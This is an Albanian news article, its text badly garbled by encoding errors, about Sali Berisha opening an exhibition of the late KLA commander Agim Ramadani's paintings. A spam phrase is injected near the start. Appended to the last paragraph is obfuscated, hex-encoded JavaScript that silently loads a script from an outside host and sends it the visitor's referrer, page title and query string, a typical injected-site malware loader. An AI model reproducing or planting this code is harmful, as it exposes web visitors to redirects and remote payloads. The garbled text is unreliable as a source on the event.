f1_15ekspo-jpg1352974716

Ekspozita e Agim Ramadanit nA� TiranA� pA�r 100 vjetorin e PavarA�sisA�

buy cheao store for sale. Kryeministri shqiptar Sali Berisha hapi mbrA�mA� ekspozitA�n e piktorit Agim Ramadani, hero i KosovA�s, i rA�nA� si komandant i UA�K-sA� nA� luftA�n e Koshares nA� vitin 1999.

Kjo ekspozitA�, e hapur nA� kuadA�r tA� 100 vjetorit tA� pavarA�sisA�, nA� GalerinA� e Arteve Pamore nA� AkademinA� e Arteve, solli punime nA� pikturA� tA� Agim Ramadanit, si dhe shumA� materiale historike rreth kontributit dhe veprA�s sA� kA�saj figure shumA� dimensionale, intelektual, poet, piktor, ushtarak e strateg nA� LuftA�n e KosovA�s, legjendA� e shqiptarizmit.

TA� pranishA�m nA� kA�tA� ceremoni ishin bashkA�shortja e heroit Agim Ramadani dhe familjarA� tA� tij, ministri i KulturA�s, RinisA� dhe Sporteve Aldo BumA�i, kryetari i BashkisA� sA� TiranA�s, LulA�zim Basha, ambasadori i ShqipA�risA� nA� PrishtinA�, Islam Lauka, dhe personalitete tA� tjerA� tA� shquar tA� fushA�s sA� artit nga ShqipA�ria e Kosova.

Kryeministri Berisha shprehu nderimin mA� tA� thellA� pA�r njA�rin prej bijve mA� tA� shquar tA� kombit shqiptar, njA�rit prej personaliteteve dhe atdhetarA�ve mA� tA� flaktA�, Agim Ramadani.

Sipas tij, tA� gjitha jetA�t e flijuara pA�r lirinA� e dinjitetin tonA� kombA�tar, flenA� nA� njA� A�ndA�rr dhe ajo A�shtA�; A�ndrra e bashkimit kombA�tar tA� shqiptarA�ve.

a�?Ideali i bashkimit kombA�tar A�shtA� ideali mA� fisnik, ideali i ndA�rtimit tA� sA� ardhmes sA� shqiptarA�ve, A�shtA� ideali i shA�rimit tA� plagA�ve dhe vuajtjeve tA� tmerrshme njA�shekullore qA� kombi pA�rjetoia�? u shpreh kryeministri Berisha. NA� kA�tA� kontekst, Kryeministri nA�nvizoi se, edhe ne, tA� frymA�zuar nga ata tA� cilA�t pA�r kA�tA� ideal flijuan jetA�n dhe rininA� e tyre, duhet tA� punojmA� A�do ditA� nA�n moton; a�?tA� bashkohemi njA�ri me tjetrin, tA� bashkohemi me EvropA�na�?, deklaroi Berisha.var _0x31f1=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}